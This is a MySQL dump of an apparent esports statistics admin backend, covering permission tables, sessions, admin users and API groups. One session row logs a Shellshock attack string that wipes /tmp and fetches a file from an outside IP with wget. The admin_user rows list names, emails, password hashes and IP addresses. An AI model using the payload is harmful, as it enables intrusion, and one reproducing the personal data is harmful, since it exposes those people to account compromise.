--
-- Host: localhost    Database: stats_system
-- ------------------------------------------------------


--
-- Table structure for table `admin_group`
--

CREATE TABLE `admin_group` (
  `admin_group_id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(50) NOT NULL,
  `update_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`admin_group_id`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8;

--
-- Dumping data for table `admin_group`
--

INSERT INTO `admin_group` VALUES (1,'Super Administrator','2015-03-29 03:02:28'),(3,'Data Entry Administrator','2015-05-22 00:09:25'),(4,'Administrator','2015-03-22 21:10:18'),(5,'Restricted Entry','2015-03-22 21:10:18');

--
-- Table structure for table `admin_group_permission`
--

CREATE TABLE `admin_group_permission` (
  `admin_group_permission_id` int(11) NOT NULL AUTO_INCREMENT,
  `admin_group_id` int(11) NOT NULL,
  `admin_permission_id` int(11) NOT NULL,
  `update_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`admin_group_permission_id`),
  KEY `admin_group_permission_admin_group_id` (`admin_group_id`),
  KEY `admin_group_permission_admin_permission_id` (`admin_permission_id`),
  CONSTRAINT `admin_group_permission_admin_group_id` FOREIGN KEY (`admin_group_id`) REFERENCES `admin_group` (`admin_group_id`) ON DELETE NO ACTION ON UPDATE NO ACTION,
  CONSTRAINT `admin_group_permission_admin_permission_id` FOREIGN KEY (`admin_permission_id`) REFERENCES `admin_permission` (`admin_permission_id`) ON DELETE NO ACTION ON UPDATE NO ACTION
) ENGINE=InnoDB AUTO_INCREMENT=1844 DEFAULT CHARSET=utf8;

--
-- Dumping data for table `admin_group_permission`
--

INSERT INTO `admin_group_permission` VALUES (1297,4,2,'2015-03-22 21:14:25'),(1298,4,3,'2015-03-22 21:14:25'),(1299,4,5,'2015-03-22 21:14:25'),(1300,4,4,'2015-03-22 21:14:25'),(1301,4,6,'2015-03-22 21:14:25'),(1302,4,1,'2015-03-22 21:14:25'),(1303,4,42,'2015-03-22 21:14:25'),(1304,4,43,'2015-03-22 21:14:46'),(1305,4,45,'2015-03-22 21:14:46'),(1306,4,44,'2015-03-22 21:14:46'),(1307,4,46,'2015-03-22 21:14:46'),(1308,4,12,'2015-03-22 21:14:46'),(1309,4,13,'2015-03-22 21:14:46'),(1310,4,15,'2015-03-22 21:14:46'),(1311,4,14,'2015-03-22 21:14:46'),(1312,4,16,'2015-03-22 21:14:46'),(1313,4,7,'2015-03-22 21:14:46'),(1314,4,8,'2015-03-22 21:14:46'),(1315,4,10,'2015-03-22 21:14:46'),(1316,4,9,'2015-03-22 21:14:46'),(1317,4,11,'2015-03-22 21:14:46'),(1318,4,37,'2015-03-22 21:14:46'),(1319,4,38,'2015-03-22 21:14:46'),(1320,4,40,'2015-03-22 21:14:46'),(1321,4,39,'2015-03-22 21:14:46'),(1322,4,41,'2015-03-22 21:14:46'),(1323,4,32,'2015-03-22 21:14:46'),(1324,4,33,'2015-03-22 21:14:46'),(1325,4,35,'2015-03-22 21:14:46'),(1326,4,34,'2015-03-22 21:14:46'),(1327,4,36,'2015-03-22 21:14:46'),(1328,4,47,'2015-03-22 21:14:46'),(1329,4,48,'2015-03-22 21:14:46'),(1330,4,50,'2015-03-22 21:14:46'),(1331,4,49,'2015-03-22 21:14:46'),(1332,4,51,'2015-03-22 21:14:46'),(1333,4,27,'2015-03-22 21:14:46'),(1334,4,28,'2015-03-22 21:14:46'),(1335,4,30,'2015-03-22 21:14:46'),(1336,4,29,'2015-03-22 21:14:46'),(1337,4,31,'2015-03-22 21:14:46'),(1338,4,17,'2015-03-22 21:14:46'),(1339,4,18,'2015-03-22 21:14:46'),(1340,4,20,'2015-03-22 21:14:46'),(1341,4,19,'2015-03-22 21:14:46'),(1342,4,21,'2015-03-22 21:14:46'),(1343,4,57,'2015-03-22 21:14:46'),(1344,4,58,'2015-03-22 21:14:46'),(1345,4,60,'2015-03-22 21:14:46'),(1346,4,59,'2015-03-22 21:14:46'),(1347,4,61,'2015-03-22 21:14:46'),(1348,4,52,'2015-03-22 21:14:46'),(1349,4,53,'2015-03-22 21:14:46'),(1350,4,55,'2015-03-22 21:14:46'),(1351,4,54,'2015-03-22 21:14:46'),(1352,4,56,'2015-03-22 21:14:46'),(1353,4,22,'2015-03-22 21:14:46'),(1354,4,23,'2015-03-22 21:14:46'),(1355,4,25,'2015-03-22 21:14:46'),(1356,4,24,'2015-03-22 21:14:46'),(1357,4,26,'2015-03-22 21:15:16'),(1358,4,82,'2015-03-22 21:15:16'),(1359,4,83,'2015-03-22 21:15:16'),(1360,4,85,'2015-03-22 21:15:16'),(1361,4,84,'2015-03-22 21:15:16'),(1430,5,2,'2015-03-22 21:15:16'),(1431,5,3,'2015-03-22 21:15:16'),(1432,5,5,'2015-03-22 21:15:16'),(1433,5,4,'2015-03-22 21:15:16'),(1434,5,6,'2015-03-22 21:15:16'),(1435,5,1,'2015-03-22 21:15:16'),(1436,5,12,'2015-03-22 21:15:16'),(1437,5,13,'2015-03-22 21:15:16'),(1438,5,15,'2015-03-22 21:15:16'),(1439,5,14,'2015-03-22 21:15:16'),(1440,5,16,'2015-03-22 21:15:16'),(1441,5,32,'2015-03-22 21:15:16'),(1442,5,33,'2015-03-22 21:15:16'),(1443,5,35,'2015-03-22 21:15:16'),(1444,5,34,'2015-03-22 21:15:16'),(1445,5,36,'2015-03-22 21:15:16'),(1446,5,47,'2015-03-22 21:15:16'),(1447,5,48,'2015-03-22 21:15:16'),(1448,5,50,'2015-03-22 21:15:16'),(1449,5,49,'2015-03-22 21:15:16'),(1450,5,51,'2015-03-22 21:15:16'),(1451,5,27,'2015-03-22 21:15:16'),(1452,5,28,'2015-03-22 21:15:16'),(1453,5,30,'2015-03-22 21:15:16'),(1454,5,29,'2015-03-22 21:15:16'),(1455,5,31,'2015-03-22 21:15:16'),(1456,5,17,'2015-03-22 21:15:16'),(1457,5,18,'2015-03-22 21:15:16'),(1458,5,20,'2015-03-22 21:15:16'),(1459,5,19,'2015-03-22 21:15:16'),(1460,5,21,'2015-03-22 21:15:16'),(1461,5,22,'2015-03-22 21:15:16'),(1462,5,23,'2015-03-22 21:15:16'),(1463,5,25,'2015-03-22 21:15:16'),(1464,5,24,'2015-03-22 21:15:16'),(1465,5,26,'2015-03-22 21:15:16'),(1684,1,67,'2015-03-28 23:02:28'),(1685,1,68,'2015-03-28 23:02:28'),(1686,1,70,'2015-03-28 23:02:28'),(1687,1,69,'2015-03-28 23:02:28'),(1688,1,71,'2015-03-28 23:02:28'),(1689,1,62,'2015-03-28 23:02:28'),(1690,1,63,'2015-03-28 23:02:28'),(1691,1,65,'2015-03-28 23:02:28'),(1692,1,64,'2015-03-28 23:02:28'),(1693,1,66,'2015-03-28 23:02:28'),(1694,1,77,'2015-03-28 23:02:28'),(1695,1,78,'2015-03-28 23:02:28'),(1696,1,80,'2015-03-28 23:02:28'),(1697,1,79,'2015-03-28 23:02:28'),(1698,1,81,'2015-03-28 23:02:28'),(1699,1,72,'2015-03-28 23:02:28'),(1700,1,73,'2015-03-28 23:02:28'),(1701,1,75,'2015-03-28 23:02:28'),(1702,1,74,'2015-03-28 23:02:28'),(1703,1,76,'2015-03-28 23:02:28'),(1704,1,93,'2015-03-28 23:02:28'),(1705,1,94,'2015-03-28 23:02:28'),(1706,1,95,'2015-03-28 23:02:28'),(1707,1,96,'2015-03-28 23:02:28'),(1708,1,97,'2015-03-28 23:02:28'),(1709,1,2,'2015-03-28 23:02:28'),(1710,1,3,'2015-03-28 23:02:28'),(1711,1,5,'2015-03-28 23:02:28'),(1712,1,4,'2015-03-28 23:02:28'),(1713,1,6,'2015-03-28 23:02:28'),(1714,1,1,'2015-03-28 23:02:28'),(1715,1,92,'2015-03-28 23:02:28'),(1716,1,42,'2015-03-28 23:02:28'),(1717,1,43,'2015-03-28 23:02:28'),(1718,1,45,'2015-03-28 23:02:28'),(1719,1,44,'2015-03-28 23:02:28'),(1720,1,46,'2015-03-28 23:02:28'),(1721,1,12,'2015-03-28 23:02:28'),(1722,1,13,'2015-03-28 23:02:28'),(1723,1,15,'2015-03-28 23:02:28'),(1724,1,14,'2015-03-28 23:02:28'),(1725,1,16,'2015-03-28 23:02:28'),(1726,1,7,'2015-03-28 23:02:28'),(1727,1,8,'2015-03-28 23:02:28'),(1728,1,10,'2015-03-28 23:02:28'),(1729,1,9,'2015-03-28 23:02:28'),(1730,1,11,'2015-03-28 23:02:28'),(1731,1,113,'2015-03-28 23:02:28'),(1732,1,114,'2015-03-28 23:02:28'),(1733,1,116,'2015-03-28 23:02:28'),(1734,1,115,'2015-03-28 23:02:28'),(1735,1,117,'2015-03-28 23:02:28'),(1736,1,103,'2015-03-28 23:02:28'),(1737,1,104,'2015-03-28 23:02:28'),(1738,1,106,'2015-03-28 23:02:28'),(1739,1,105,'2015-03-28 23:02:28'),(1740,1,107,'2015-03-28 23:02:28'),(1741,1,37,'2015-03-28 23:02:28'),(1742,1,38,'2015-03-28 23:02:28'),(1743,1,40,'2015-03-28 23:02:28'),(1744,1,39,'2015-03-28 23:02:28'),(1745,1,41,'2015-03-28 23:02:28'),(1746,1,52,'2015-03-28 23:02:28'),(1747,1,53,'2015-03-28 23:02:28'),(1748,1,55,'2015-03-28 23:02:28'),(1749,1,54,'2015-03-28 23:02:28'),(1750,1,56,'2015-03-28 23:02:28'),(1751,1,32,'2015-03-28 23:02:28'),(1752,1,33,'2015-03-28 23:02:28'),(1753,1,35,'2015-03-28 23:02:28'),(1754,1,34,'2015-03-28 23:02:28'),(1755,1,36,'2015-03-28 23:02:28'),(1756,1,47,'2015-03-28 23:02:28'),(1757,1,48,'2015-03-28 23:02:28'),(1758,1,50,'2015-03-28 23:02:28'),(1759,1,49,'2015-03-28 23:02:28'),(1760,1,51,'2015-03-28 23:02:28'),(1761,1,27,'2015-03-28 23:02:28'),(1762,1,28,'2015-03-28 23:02:28'),(1763,1,30,'2015-03-28 23:02:28'),(1764,1,29,'2015-03-28 23:02:28'),(1765,1,31,'2015-03-28 23:02:28'),(1766,1,108,'2015-03-28 23:02:28'),(1767,1,109,'2015-03-28 23:02:28'),(1768,1,111,'2015-03-28 23:02:28'),(1769,1,110,'2015-03-28 23:02:28'),(1770,1,112,'2015-03-28 23:02:28'),(1771,1,98,'2015-03-28 23:02:28'),(1772,1,102,'2015-03-28 23:02:28'),(1773,1,100,'2015-03-28 23:02:28'),(1774,1,99,'2015-03-28 23:02:28'),(1775,1,101,'2015-03-28 23:02:28'),(1776,1,17,'2015-03-28 23:02:28'),(1777,1,18,'2015-03-28 23:02:28'),(1778,1,20,'2015-03-28 23:02:28'),(1779,1,19,'2015-03-28 23:02:28'),(1780,1,21,'2015-03-28 23:02:28'),(1781,1,57,'2015-03-28 23:02:28'),(1782,1,58,'2015-03-28 23:02:28'),(1783,1,60,'2015-03-28 23:02:28'),(1784,1,59,'2015-03-28 23:02:28'),(1785,1,61,'2015-03-28 23:02:28'),(1786,1,22,'2015-03-28 23:02:28'),(1787,1,23,'2015-03-28 23:02:28'),(1788,1,25,'2015-03-28 23:02:28'),(1789,1,24,'2015-03-28 23:02:28'),(1790,1,26,'2015-03-28 23:02:28'),(1791,1,82,'2015-03-28 23:02:28'),(1792,1,83,'2015-03-28 23:02:28'),(1793,1,85,'2015-03-28 23:02:28'),(1794,1,84,'2015-03-28 23:02:28'),(1795,1,86,'2015-03-28 23:02:28'),(1802,1,0,'2015-04-03 23:48:57'),(1803,1,118,'2015-04-04 19:54:40'),(1804,1,119,'2015-04-05 21:07:08'),(1805,1,120,'2015-04-06 18:23:12'),(1806,1,121,'2015-04-06 18:24:45'),(1807,1,122,'2015-04-07 17:02:35'),(1808,1,123,'2015-04-13 22:18:26'),(1809,1,124,'2015-04-14 21:06:34'),(1813,3,0,'2015-05-21 20:37:12'),(1814,3,118,'2015-05-21 20:37:12'),(1815,3,119,'2015-05-21 20:37:12'),(1816,3,120,'2015-05-21 20:37:12'),(1817,3,121,'2015-05-21 20:37:12'),(1818,3,122,'2015-05-21 20:37:12'),(1819,3,124,'2015-05-21 20:37:14'),(1820,1,125,'2015-05-25 16:01:48'),(1821,1,127,'2015-05-30 03:00:28'),(1822,1,128,'2015-05-30 03:00:29'),(1823,1,129,'2015-05-30 03:00:29'),(1824,1,130,'2015-05-30 03:00:29'),(1826,1,132,'2015-05-30 03:00:29'),(1827,1,133,'2015-05-30 03:00:29'),(1828,1,134,'2015-05-30 03:00:29'),(1829,1,135,'2015-05-30 03:00:29'),(1830,1,136,'2015-05-30 03:00:29'),(1831,1,137,'2015-05-30 03:00:29'),(1832,1,126,'2015-06-02 14:15:10'),(1833,1,138,'2015-06-02 14:15:10'),(1834,1,139,'2015-06-06 14:15:10'),(1835,1,140,'2015-06-06 14:15:50'),(1836,1,141,'2015-06-06 14:15:50'),(1837,1,142,'2015-06-09 00:49:20'),(1838,1,143,'2015-06-09 00:49:20'),(1839,1,144,'2015-06-09 00:49:20'),(1840,1,145,'2015-06-09 00:49:20'),(1841,1,146,'2015-06-23 16:17:46'),(1842,1,147,'2015-06-23 16:17:46'),(1843,1,148,'2015-06-25 23:38:28');

--
-- Table structure for table `admin_permission`
--

CREATE TABLE `admin_permission` (
  `admin_permission_id` int(11) NOT NULL AUTO_INCREMENT,
  `class` varchar(30) NOT NULL,
  `method` varchar(30) NOT NULL,
  `label` varchar(30) NOT NULL,
  `update_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`admin_permission_id`)
) ENGINE=InnoDB AUTO_INCREMENT=149 DEFAULT CHARSET=utf8;

--
-- Dumping data for table `admin_permission`
--

INSERT INTO `admin_permission` VALUES (0,'gameselect','index','Game','2015-04-03 23:43:13'),(1,'dashboard','index','Dashboard','0000-00-00 00:00:00'),(2,'champions','index','Champions','0000-00-00 00:00:00'),(3,'champions','add','Add','0000-00-00 00:00:00'),(4,'champions','manage','Manage','0000-00-00 00:00:00'),(5,'champions','delete','Delete','0000-00-00 00:00:00'),(6,'champions','update','Update','0000-00-00 00:00:00'),(7,'leagues','index','Leagues','0000-00-00 00:00:00'),(8,'leagues','add','Add','0000-00-00 00:00:00'),(9,'leagues','manage','Manage','0000-00-00 00:00:00'),(10,'leagues','delete','Delete','0000-00-00 00:00:00'),(11,'leagues','update','Update','0000-00-00 00:00:00'),(12,'items','index','Items','0000-00-00 00:00:00'),(13,'items','add','Add','0000-00-00 00:00:00'),(14,'items','manage','Manage','0000-00-00 00:00:00'),(15,'items','delete','Delete','0000-00-00 00:00:00'),(16,'items','update','Update','0000-00-00 00:00:00'),(17,'spells','index','Spells','0000-00-00 00:00:00'),(18,'spells','add','Add','0000-00-00 00:00:00'),(19,'spells','manage','Manage','0000-00-00 00:00:00'),(20,'spells','delete','Delete','0000-00-00 00:00:00'),(21,'spells','update','Update','0000-00-00 00:00:00'),(22,'teams','index','Teams','0000-00-00 00:00:00'),(23,'teams','add','Add','0000-00-00 00:00:00'),(24,'teams','manage','Manage','0000-00-00 00:00:00'),(25,'teams','delete','Delete','0000-00-00 00:00:00'),(26,'teams','update','Update','0000-00-00 00:00:00'),(27,'roles','index','Roles','0000-00-00 00:00:00'),(28,'roles','add','Add','0000-00-00 00:00:00'),(29,'roles','manage','Manage','0000-00-00 00:00:00'),(30,'roles','delete','Delete','0000-00-00 00:00:00'),(31,'roles','update','Update','0000-00-00 00:00:00'),(32,'players','index','Players','0000-00-00 00:00:00'),(33,'players','add','Add','0000-00-00 00:00:00'),(34,'players','manage','Manage','0000-00-00 00:00:00'),(35,'players','delete','Delete','0000-00-00 00:00:00'),(36,'players','update','Update','0000-00-00 00:00:00'),(37,'overseers','index','Overseers','0000-00-00 00:00:00'),(38,'overseers','add','Add','0000-00-00 00:00:00'),(39,'overseers','manage','Manage','0000-00-00 00:00:00'),(40,'overseers','delete','Delete','0000-00-00 00:00:00'),(41,'overseers','update','Update','0000-00-00 00:00:00'),(42,'games','index','Games','0000-00-00 00:00:00'),(43,'games','add','Add','0000-00-00 00:00:00'),(44,'games','manage','Manage','0000-00-00 00:00:00'),(45,'games','delete','Delete','0000-00-00 00:00:00'),(46,'games','update','Update','0000-00-00 00:00:00'),(47,'regions','index','Regions','0000-00-00 00:00:00'),(48,'regions','add','Add','0000-00-00 00:00:00'),(49,'regions','manage','Manage','0000-00-00 00:00:00'),(50,'regions','delete','Delete','0000-00-00 00:00:00'),(51,'regions','update','Update','0000-00-00 00:00:00'),(52,'patches','index','Patches','0000-00-00 00:00:00'),(53,'patches','add','Add','0000-00-00 00:00:00'),(54,'patches','manage','Manage','0000-00-00 00:00:00'),(55,'patches','delete','Delete','0000-00-00 00:00:00'),(56,'patches','update','Update','0000-00-00 00:00:00'),(57,'splits','index','Splits','0000-00-00 00:00:00'),(58,'splits','add','Add','0000-00-00 00:00:00'),(59,'splits','manage','Manage','0000-00-00 00:00:00'),(60,'splits','delete','Delete','0000-00-00 00:00:00'),(61,'splits','update','Update','0000-00-00 00:00:00'),(62,'adminusers','index','Admin Users','0000-00-00 00:00:00'),(63,'adminusers','add','Add','0000-00-00 00:00:00'),(64,'adminusers','manage','Manage','0000-00-00 00:00:00'),(65,'adminusers','delete','Delete','0000-00-00 00:00:00'),(66,'adminusers','update','Update','0000-00-00 00:00:00'),(67,'admingroups','index','Admin Groups','0000-00-00 00:00:00'),(68,'admingroups','add','Add','0000-00-00 00:00:00'),(69,'admingroups','manage','Manage','0000-00-00 00:00:00'),(70,'admingroups','delete','Delete','0000-00-00 00:00:00'),(71,'admingroups','update','Update','0000-00-00 00:00:00'),(72,'apiusers','index','API Users','0000-00-00 00:00:00'),(73,'apiusers','add','Add','0000-00-00 00:00:00'),(74,'apiusers','manage','Manage','0000-00-00 00:00:00'),(75,'apiusers','delete','Delete','0000-00-00 00:00:00'),(76,'apiusers','update','Update','0000-00-00 00:00:00'),(77,'apigroups','index','API Groups','0000-00-00 00:00:00'),(78,'apigroups','add','Add','0000-00-00 00:00:00'),(79,'apigroups','manage','Manage','0000-00-00 00:00:00'),(80,'apigroups','delete','Delete','0000-00-00 00:00:00'),(81,'apigroups','update','Update','0000-00-00 00:00:00'),(82,'tournaments','index','Tournaments','0000-00-00 00:00:00'),(83,'tournaments','add','Add','0000-00-00 00:00:00'),(84,'tournaments','manage','Manage','0000-00-00 00:00:00'),(85,'tournaments','delete','Delete','0000-00-00 00:00:00'),(86,'tournaments','update','Update','0000-00-00 00:00:00'),(92,'events','index','Events','2014-08-21 07:44:15'),(93,'buildings','index','Buidlings','0000-00-00 00:00:00'),(94,'buildings','add','Add','0000-00-00 00:00:00'),(95,'buildings','delete','Delete','0000-00-00 00:00:00'),(96,'buildings','manage','Manage','0000-00-00 00:00:00'),(97,'buildings','update','Update','0000-00-00 00:00:00'),(98,'skills','index','Skills','0000-00-00 00:00:00'),(99,'skills','manage','Manage','0000-00-00 00:00:00'),(100,'skills','delete','Delete','0000-00-00 00:00:00'),(101,'skills','update','Update','0000-00-00 00:00:00'),(102,'skills','add','Add','0000-00-00 00:00:00'),(103,'monsters','index','Monster','0000-00-00 00:00:00'),(104,'monsters','add','Add','0000-00-00 00:00:00'),(105,'monsters','manage','Manage','0000-00-00 00:00:00'),(106,'monsters','delete','Delete','0000-00-00 00:00:00'),(107,'monsters','update','Update','0000-00-00 00:00:00'),(108,'runes','index','Runes','0000-00-00 00:00:00'),(109,'runes','add','Add','0000-00-00 00:00:00'),(110,'runes','manage','Manage','0000-00-00 00:00:00'),(111,'runes','delete','Delete','0000-00-00 00:00:00'),(112,'runes','update','Update','0000-00-00 00:00:00'),(113,'masteries','index','Masteries','0000-00-00 00:00:00'),(114,'masteries','add','Add','0000-00-00 00:00:00'),(115,'masteries','manage','Manage','0000-00-00 00:00:00'),(116,'masteries','delete','Delete','0000-00-00 00:00:00'),(117,'masteries','update','Update','0000-00-00 00:00:00'),(118,'gameselect','getdate','Game','2015-04-04 19:53:43'),(119,'gameselect','selectedgame','Game','2015-04-05 21:07:03'),(120,'pickban','index','Game','2015-04-06 18:22:51'),(121,'livegame','index','Game','2015-04-06 18:24:32'),(122,'livegame','updategame','Game','2015-04-07 17:01:59'),(123,'champions','getallfromriot','Add','2015-04-13 22:18:19'),(124,'pickban','ajaxupdate','Game','2015-04-14 21:06:28'),(125,'apiusers','ajax','API','2015-05-25 15:56:44'),(126,'teams','gettournamentsbyteam','Tournament','2015-05-29 20:26:57'),(127,'games','validate','Validation','2015-05-30 03:00:02'),(128,'games','validatepull','Validation','2015-05-30 03:00:07'),(129,'masteries','getallfromriot','Add','0000-00-00 00:00:00'),(130,'skills','getallfromriot','Add','0000-00-00 00:00:00'),(132,'runes','getallfromriot','Add','0000-00-00 00:00:00'),(133,'monsters','getallfromriot','Add','0000-00-00 00:00:00'),(134,'buildings','getallfromriot','Add','0000-00-00 00:00:00'),(135,'items','getallfromriot','Add','0000-00-00 00:00:00'),(136,'spells','getallfromriot','Add','0000-00-00 00:00:00'),(137,'games','pullhistoricaldata','HistoricalData','0000-00-00 00:00:00'),(138,'games','validateComplete','Validate','0000-00-00 00:00:00'),(139,'models','model_data','Model data creator','0000-00-00 00:00:00'),(140,'models','index','Model creator','0000-00-00 00:00:00'),(141,'patches','getallfromriot','PullPatch','0000-00-00 00:00:00'),(142,'reports','index','Reports','2015-06-09 00:46:23'),(143,'reports','lcs_weekly','LCSWeekly','2015-06-09 00:46:23'),(144,'test','index','Index','2015-06-09 00:46:23'),(145,'test','getdata','Test getdata','2015-06-09 00:46:23'),(146,'livegame','showlivegame','Show current Live games','2015-06-23 16:17:40'),(147,'livegame','livestats','Show current live stats pulled','2015-06-23 16:17:40'),(148,'players','getesportsapiplayers','Get eSports Players','2015-06-25 01:08:50');

--
-- Table structure for table `admin_session`
--

CREATE TABLE `admin_session` (
  `session_id` varchar(40) NOT NULL DEFAULT '0',
  `ip_address` varchar(45) NOT NULL DEFAULT '0',
  `user_agent` varchar(120) NOT NULL,
  `last_activity` int(10) unsigned NOT NULL DEFAULT '0',
  `user_data` text NOT NULL,
  PRIMARY KEY (`session_id`),
  KEY `last_activity_idx` (`last_activity`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `admin_session`
--

INSERT INTO `admin_session` VALUES ('2328bed95d6d8abe6f481853d7f225f8','58.213.123.107','() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://202.103.243.104:911/1122.32 -O /tmp/China.Z-zxjt >> /tmp/Run.sh;',1435276817,''),('8cd8cc5ec063a325c1dd0fbca53958e8','84.24.3.137','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.3',1435283634,'a:6:{s:9:\"user_data\";s:0:\"\";s:13:\"user_loggedin\";b:1;s:8:\"username\";s:6:\"andrax\";s:13:\"admin_user_id\";s:1:\"8\";s:14:\"admin_group_id\";s:1:\"1\";s:14:\"local_timezone\";s:16:\"Europe/Amsterdam\";}'),('d0aa4e35e7b74cc842027035ec10d782','172.249.156.98','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36',1435278663,'');

--
-- Table structure for table `admin_user`
--

CREATE TABLE `admin_user` (
  `admin_user_id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(50) NOT NULL,
  `username` varchar(50) NOT NULL,
  `password` varchar(255) NOT NULL,
  `email` varchar(255) NOT NULL,
  `status` int(1) NOT NULL,
  `last_login` int(11) NOT NULL,
  `last_ip` varchar(15) NOT NULL,
  `admin_group_id` int(11) NOT NULL,
  `update_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `local_timezone` varchar(100) NOT NULL,
  PRIMARY KEY (`admin_user_id`),
  KEY `admin_users_group_id` (`admin_group_id`),
  CONSTRAINT `admin_users_group_id` FOREIGN KEY (`admin_group_id`) REFERENCES `admin_group` (`admin_group_id`) ON DELETE NO ACTION ON UPDATE NO ACTION
) ENGINE=InnoDB AUTO_INCREMENT=22 DEFAULT CHARSET=utf8;

--
-- Dumping data for table `admin_user`
--

INSERT INTO `admin_user` VALUES (0,'Server default logger','serverlogger','$2y$09$pw1mCbgoimhwLdshtE3i/eXU6AMfJFPkn1LTYlCxx6sD6PuK3BGrm','logger@lolstats.gg',1,0,'',1,'2015-05-03 22:41:09','America/New_York'),(1,'Super Administrator','josh','$2y$09$QC6u9RHUG9FTB2kOyF/ws.cqm5dou4mRMIUDoiN7NYSDBGxVRkOdC','joshua.kreis@gmail.com',0,1430703851,'99.36.115.52',1,'2015-05-23 19:59:28','America/Los_Angeles'),(2,'Evan Walker','evan','$2y$09$OaKIeaLmb42jkkuKNyKcn.7QjIfw1kT.L7mQY1JhQF1PxNXtO/hGi','evan@lolstats.gg',1,1435273189,'73.174.153.190',1,'2015-03-23 04:49:22','America/New York'),(3,'Zach Owens','zach','$2y$09$4.J468B7A8Fm75/YGy9zlOiTVFtT5T/7ERkTzqf/70pHclqfvbDn.','zach@lolstats.gg',1,1435269393,'172.249.156.98',1,'2015-03-23 04:49:22','America/Los_Angeles'),(4,'Hannes Kranich','hannes','$2y$09$y2nVbI1853ubBc2mAP9s3O23wkvSkxgHYCyXJxiy3PX2duy6m6kpy','hannes@lolstats.gg',1,1435269816,'80.235.71.152',1,'2015-03-23 04:49:22','Europe/Tallinn'),(5,'Connor Lewellyn','connor','$2y$09$dE2QKZZc6iySpz8FiWP1dOyhXykEKBm8JA3rNDOvICZnqGNBZiSSa','lewellync@gmail.com',0,1430522553,'72.95.147.28',1,'2015-03-23 04:49:22','America/New York'),(6,'Ben Sholes','ben','$2y$09$cnQGbVtgEHWsm0l0unvpTeheS5RoSVCv3cOWvolDRlSfeMxeLLZK2','ben.sholes@gmail.com',1,1429637050,'161.162.84.83',1,'2015-03-23 04:49:22','America/New York'),(7,'Martin Decoud','martin','$2y$09$g/NH6zvx3cRlrvRMDCHoseK8nbzqn6dKPbC9Y631CR7cuGXcruOSi','martin.decoud@datdota.com',1,1429752263,'71.232.209.185',1,'2015-03-23 04:49:22','America/New York'),(8,'Andrax vd Bogaard','andrax','$2y$09$6eZlPeQYWcYnuG4AsU4TyONuCWVQH65MfeOVCdpV.G0P8Izy43UU6','andraxb@gmail.com',1,1435275745,'84.24.3.137',1,'2015-05-22 00:07:08','Europe/Amsterdam'),(11,'Tommy','tommy','$2y$09$C5NbtbuRuo3txNY/fo8FBu0wGeQZD9oLAOutdJ/sgUfmKRXrux4jW','tommy@lolstats.gg',1,0,'',3,'2015-05-22 00:45:29','America/New_York'),(12,'Hammish','hammish','$2y$09$E0hOyW1t0CgPwwsxB/JrPOAa1HainRvqROePf269mEX5oUFB4Pl8m','hammish@lolstats.gg',1,0,'',3,'2015-05-22 00:46:18','America/New_York'),(13,'Mitchell','mitchell','$2y$09$pkFilQ1fX8P77XV0qQt13uJHgGF2csy0I8NvwzbHFE9DGkPCK7wSu','mitchell@lolstats.gg',1,1433097510,'213.236.42.89',3,'2015-05-22 09:09:10','America/New_York'),(14,'Joao','joao','$2y$09$aX7lOFv3/njmLufvpOmUWOTeJJzsKt.Pkjt44COnWWHBIL01PYjH.','joao@lolstats.gg',1,1432292067,'188.251.219.18',3,'2015-05-22 00:47:55','America/New_York'),(15,'Tomislav','tomislav','$2y$09$qtTROjAjr6yBLnUOcvCrAe.1rfUmgiacYlr9Guu0Yxs/zezccYx3m','tomislav@lolstats.gg',1,0,'',3,'2015-05-22 00:48:43','America/New_York'),(16,'Bert Lee','bert','$2y$09$6tz5MhC8.s1KXvzJujcl7ubeebjIp2Y3s2Vi23ug1YRGh9RcEMA3y','bert.hb.lee@gmail.com',1,1435111736,'203.198.53.157',1,'2015-05-22 02:01:10','Asia/Hong_Kong'),(17,'Cem Yesil','cem','$2y$09$OaKIeaLmb42jkkuKNyKcn.7QjIfw1kT.L7mQY1JhQF1PxNXtO/hGi','cem.yesil@live.at',1,1432849109,'1,0',1,'0000-00-00 00:00:00','Austria/Vienna'),(18,'Ming AY','ayming','$2y$09$IlRSJXMBI5mhTfOlPstJ.euOI0r7vYzTh0vMV.HdTJiYMzr/NswaS','ming_ay@yahoo.com.hk',1,1433851033,'14.136.14.12',1,'2015-06-02 01:38:10','Asia/Hong_Kong'),(19,'Dhox','Dhox','$2y$09$J7RgnkEuvYNn92IduaTZNevzxDKXHP.A9EZ5ZumJUkv9K5uBMGwhu','Dhox@lolstats.gg',1,1435247978,'49.149.95.7',3,'2015-06-04 19:41:41','America/New_York'),(20,'Data Entry Administrator','Mapgar','$2y$09$4V4ENjDcHhqZAazHvtQm5.XrOD4YdE2i9Q1scD60geSybjiEK3lk.','Mdahaz@gmail.com',1,1434913788,'99.130.98.78',3,'2015-06-14 22:39:57','America/Los_Angeles'),(21,'Kamran Ahmed','kamran','$2y$09$8qqgdLanoOkvSYZ.P62SBeFT4spKibeT1GbsHUw10WLVRa90x2joa','kamranahmed.se@gmail.com',1,0,'',1,'2015-06-23 19:34:06','Asia/Karachi');

--
-- Table structure for table `api_group`
--

CREATE TABLE `api_group` (
  `api_group_id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(50) NOT NULL,
  `update_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`api_group_id`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;

--
-- Dumping data for table `api_group`
--

INSERT INTO `api_group` VALUES (0,'Guest Permissions','2015-03-22 21:02:01'),(1,'Per Game','2015-04-22 04:46:17'),(2,'Per Month','2015-03-22 21:07:07'),(3,'Full Access','2015-03-22 21:02:01');

--
